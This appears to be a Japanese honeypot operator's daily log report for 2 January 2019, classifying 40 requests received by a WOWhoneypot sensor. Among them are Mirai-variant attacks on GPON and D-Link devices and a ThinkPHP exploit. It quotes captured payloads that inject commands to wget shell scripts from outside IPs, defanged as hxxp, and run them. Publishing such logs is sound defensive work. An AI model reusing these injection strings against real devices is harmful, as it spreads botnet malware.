ハニーポットのログ分析(2019/01/02)
WOWhoneypotの2019/01/02(水) (運用210日目)の簡易分析です。
本日の総アクセス件数は 40件です。
本日のドメイン名でのアクセスは以下です。
5 GET /
2 GET /robots.txt
本日のハンティングログは以下です。
1 2019-01-02 wget hxxp://77.87.77.250/izuku.sh
1 2019-01-02 wget hxxp://167.99.219.142/ex.sh
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 26 | 2019-01-02 | アクセス | GET / |
| 4 | 2019-01-02 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
| 4 | 2019-01-02 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?images/ |
| 2 | 2019-01-02 | クローリング | GET /robots.txt |
| 1 | 2019-01-02 | Apacheサーバの調査 | HEAD /icons/apache_pb.gif |
| 1 | 2019-01-02 | phpのWebShell設置の調査 | GET /wpo.php |
| 1 | 2019-01-02 | D-Linkを狙うMirai亜種 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
| 1 | 2019-01-02 | ThinkPHPの脆弱性を突いた攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=cd%20/tmp;wget%20hxxp://167.99.219.142/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh |
以上です。
